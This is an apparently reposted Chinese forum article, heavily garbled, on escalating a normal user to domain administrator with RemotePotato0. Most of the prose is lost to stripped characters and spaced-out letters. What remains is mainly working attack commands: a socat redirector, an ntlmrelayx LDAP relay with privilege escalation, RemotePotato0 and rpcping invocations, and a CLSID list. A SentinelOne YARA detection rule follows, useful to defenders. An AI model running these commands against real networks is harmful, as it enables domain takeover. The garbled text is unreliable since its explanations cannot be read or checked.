搜索

[17215] 2021-08-31_如何使用RemotePotato0从普通用户提升至域管理员

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-08-31_如何使用RemotePotato0从普通用户提升至域管理员 使 R e m o t e P o t a t o 0 A l p h a _ h 4 c k   F r e e B u f   2 0 2 1 - 0 8 - 3 1 R e m o t e P o t a t o 0 R e m o t e P o t a t o 0 W i n d o w s R e m o t e P o t a t o 0 广 W i n d o w s R e m o t e P o t a t o 0 D C O M N T L M N T L M   t y p e 1 R e m o t e P o t a t o 0 t y p e 1 R P C H T T P n t l m r e l a y x R e m o t e P o t a t o 0 N T L M v 2 广 使 使 使 1 0 . 0 . 0 . 2 0 1 0 . 0 . 0 . 4 5 1 0 . 0 . 0 . 1 0 0   -   R p c 2 H t t p   +   p o t a t o W i n d o w s   S e r v e r   < =   2 0 1 6 使 s o c a t g i t   c l o n e   h t t p s : / / g i t h u b . c o m / a n t o n i o C o c o / R e m o t e P o t a t o 0 . g i t s u d o   s o c a t   - v   T C P - L I S T E N : 1 3 5 , f o r k , r e u s e a d d r   T C P : 1 0 . 0 . 0 . 4 5 : 9 9 9 9   & s u d o   n t l m r e l a y x . p y   - t   l d a p : / / 1 0 . 0 . 0 . 1 0   - - n o - w c f - s e r v e r   - - e s c a l a t e - u s e r   n o r m a l _ u s e r q u e r y   u s e r
1   -   R p c 2 H t t p 2   -   R P C 使 使 q u e r y   u s e r . R e m o t e P o t a t o 0 . e x e   - m   0   - r   1 0 . 0 . 0 . 2 0   - x   1 0 . 0 . 0 . 2 0   - p   9 9 9 9   - s   1 . R e m o t e P o t a t o 0 . e x e   - m   1   - l   9 9 9 7   - r   1 0 . 0 . 0 . 2 0 r p * c p i n g   - s   1 2 7 . 0 . 0 . 1   - e   9 9 9 7   - a   c o n n e c t   - u   n t l m . R e m o t e P o t a t o 0 . e x e   - m   3   - l   9 9 9 7 r p * c p i n g   - s   1 2 7 . 0 . 0 . 1   - e   9 9 9 7   - a   c o n n e c t   - u   n t l m R e m o t e P o t a t o 0                 @ s p l i n t e r _ c o d e   &   @ d e c o d e r _ i t M a n d a t o r y   a r g s : - m   m o d u l e                 A l l o w e d   v a l u e s :                 0   -   R p c 2 H t t p   c r o s s   p r o t o c o l   r e l a y   s e r v e r   +   p o t a t o   t r i g g e r   ( d e f a u l t )                 1   -   R p c 2 H t t p   c r o s s   p r o t o c o l   r e l a y   s e r v e r                 2   -   R p c   c a p t u r e   ( h a s h )   s e r v e r   +   p o t a t o   t r i g g e r                 3   -   R p c   c a p t u r e   ( h a s h )   s e r v e r O t h e r   a r g s :   ( s o m e o n e   c o u l d   b e   m a n d a t o r y   a n d / o r   o p t i o n a l   b a s e d   o n   t h e   m o d u l e   y o u   u s e ) - r   H T T P I P - t   H T T P   ( 8 0 ) - x   O x i d I P   ( 1 2 7 . 0 . 0 . 1 )
G I F G I F C L S I D W i n d o w s C L S I D W i n d o w s   S e r v e r   2 0 1 9 W i n d o w s   S e r v e r   2 0 1 6 - p   O x i d   ( 9 9 9 9 ) - l   R P C   ( 9 9 9 7 ) - s   I P   ( d i s a b l e d ) - c   C L S I D   ( { 5 1 6 7 B 4 2 F - C 1 1 1 - 4 7 A 1 - A C C 4 - 8 E A B E 6 1 B 0 B 5 4 } ) { 0 0 0 2 D F 0 2 - 0 0 0 0 - 0 0 0 0 - C 0 0 0 - 0 0 0 0 0 0 0 0 0 0 4 6 }   -   B r o w s e r B r o k e r   C l a s s { 0 e a 7 9 5 6 2 - d 4 f 6 - 4 7 b a - b 7 f 2 - 1 e 9 b 0 6 b a 1 6 a 4 }   -   A u t h B r o k e r U I { 5 1 6 7 B 4 2 F - C 1 1 1 - 4 7 A 1 - A C C 4 - 8 E A B E 6 1 B 0 B 5 4 }   -   E a s c o n s e n t . d l l { 9 2 4 D C 5 6 4 - 1 6 A 6 - 4 2 E B - 9 2 9 A - 9 A 6 1 F A 7 D A 0 6 F }   -   A u t h e n t i c a t i o n   U I   C r e d U I   O u t   o f   P r o c   H e l p e r   f o r   N o n - A p p C o n t a i n e r   C l i e n t s { 9 3 4 b 4 1 0 c - 4 3 e 4 - 4 1 5 e - 9 9 3 5 - f b c 0 8 1 b a 9 3 a 9 }   -   U s e r I n f o D i a l o g { B A 4 4 1 4 1 9 - 0 B 3 F - 4 F B 6 - A 9 0 3 - D 1 6 C C 1 4 C C A 4 4 }   -   C L S I D _ L o c k S c r e e n C o n t e n t i o n F l y o u t { c 5 8 c a 8 5 9 - 8 0 b c - 4 8 d f - 8 f 0 6 - f f a 9 4 a 4 0 5 b f f }   -   P i c k e r   H o s t { f 6 5 8 1 7 c 8 - d d 8 5 - 4 1 3 6 - 8 9 f 0 - b 9 d 1 2 9 3 9 f 2 c 4 }   -   I s o l a t e d M e s s a g e D i a l o g F a c t o r y { F 8 7 B 2 8 F 1 - D A 9 A - 4 F 3 5 - 8 E C 0 - 8 0 0 E F C F 2 6 B 8 3 }   -   S P P U I O b j e c t I n t e r a c t i v e   C l a s s { f 8 8 4 2 f 8 e - d a f e - 4 b 3 7 - 9 d 3 8 - 4 e 0 7 1 4 a 6 1 1 4 9 }   -   C a s t S e r v e r I n t e r a c t i v e U s e r { 9 2 4 D C 5 6 4 - 1 6 A 6 - 4 2 E B - 9 2 9 A - 9 A 6 1 F A 7 D A 0 6 F } { f 6 5 8 1 7 c 8 - d d 8 5 - 4 1 3 6 - 8 9 f 0 - b 9 d 1 2 9 3 9 f 2 c 4 } { B A 4 4 1 4 1 9 - 0 B 3 F - 4 F B 6 - A 9 0 3 - D 1 6 C C 1 4 C C A 4 4 } { 0 e a 7 9 5 6 2 - d 4 f 6 - 4 7 b a - b 7 f 2 - 1 e 9 b 0 6 b a 1 6 a 4 } { 9 3 4 b 4 1 0 c - 4 3 e 4 - 4 1 5 e - 9 9 3 5 - f b c 0 8 1 b a 9 3 a 9 } { f 8 8 4 2 f 8 e - d a f e - 4 b 3 7 - 9 d 3 8 - 4 e 0 7 1 4 a 6 1 1 4 9 } { 0 0 0 2 D F 0 2 - 0 0 0 0 - 0 0 0 0 - C 0 0 0 - 0 0 0 0 0 0 0 0 0 0 4 6 }
W i n d o w s   S e r v e r   2 0 0 8   R 2 使 Y a r a R e m o t e P o t a t o 0 R e m o t e P o t a t o 0 h t t p : / / o h p e . i t / j u i c y - p o t a t o / C L S I D / { 5 1 6 7 B 4 2 F - C 1 1 1 - 4 7 A 1 - A C C 4 - 8 E A B E 6 1 B 0 B 5 4 } { c 5 8 c a 8 5 9 - 8 0 b c - 4 8 d f - 8 f 0 6 - f f a 9 4 a 4 0 5 b f f } { F 8 7 B 2 8 F 1 - D A 9 A - 4 F 3 5 - 8 E C 0 - 8 0 0 E F C F 2 6 B 8 3 } { F C C 7 4 B 7 7 - E C 3 E - 4 d d 8 - A 8 0 B - 0 0 8 A 7 0 2 0 7 5 A 9 } { 9 B A 0 5 9 7 2 - F 6 A 8 - 1 1 C F - A 4 4 2 - 0 0 A 0 C 9 0 A 8 F 3 9 } { F 8 7 B 2 8 F 1 - D A 9 A - 4 F 3 5 - 8 E C 0 - 8 0 0 E F C F 2 6 B 8 3 } r u l e   S e n t i n e l O n e _ R e m o t e P o t a t o 0 _ p r i v e s c   {         m e t a :                 a u t h o r   =   " S e n t i n e l O n e "                 d e s c r i p t i o n   =   " D e t e c t s   R e m o t e P o t a t o 0   b i n a r y "                 r e f e r e n c e   =   " h t t p s : / / l a b s . s e n t i n e l o n e . c o m / r e l a y i n g - p o t a t o e s - d c e - r p c - n t l m - r e l a y - e o p "         s t r i n g s :                 $ i m p o r t 1   =   " C o G e t I n s t a n c e F r o m I S t o r a g e "                 $ i s t o r a g e _ c l s i d   =   " { 0 0 0 0 0 3 0 6 - 0 0 0 0 - 0 0 0 0 - c 0 0 0 - 0 0 0 0 0 0 0 0 0 0 4 6 } "   n o c a s e   w i d e   a s c i i                 $ m e o w _ h e a d e r   =   {   4 d   4 5   4 f   5 7   }                 $ c l s i d 1   =   " { 1 1 1 1 1 1 1 1 - 2 2 2 2 - 3 3 3 3 - 4 4 4 4 - 5 5 5 5 5 5 5 5 5 5 5 5 } "   n o c a s e   w i d e   a s c i i                 $ c l s i d 2   =   " { 5 1 6 7 B 4 2 F - C 1 1 1 - 4 7 A 1 - A C C 4 - 8 E A B E 6 1 B 0 B 5 4 } "   n o c a s e   w i d e   a s c i i         c o n d i t i o n :                 ( u i n t 1 6 ( 0 )   = =   0 x 5 A 4 D )   a n d   $ i m p o r t 1   a n d   $ i s t o r a g e _ c l s i d   a n d   $ m e o w _ h e a d e r   a n d   1   o f   ( $ c l s i d * ) }
h t t p s : / / l a b s . s e n t i n e l o n e . c o m / r e l a y i n g - p o t a t o e s - d c e - r p c - n t l m - r e l a y - e o p / h t t p s : / / w w w . t i r a n i d d o . d e v / 2 0 2 1 / 0 4 / s t a n d a r d - a c t i v a t i n g - y o u r s e l f - t o . h t m l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理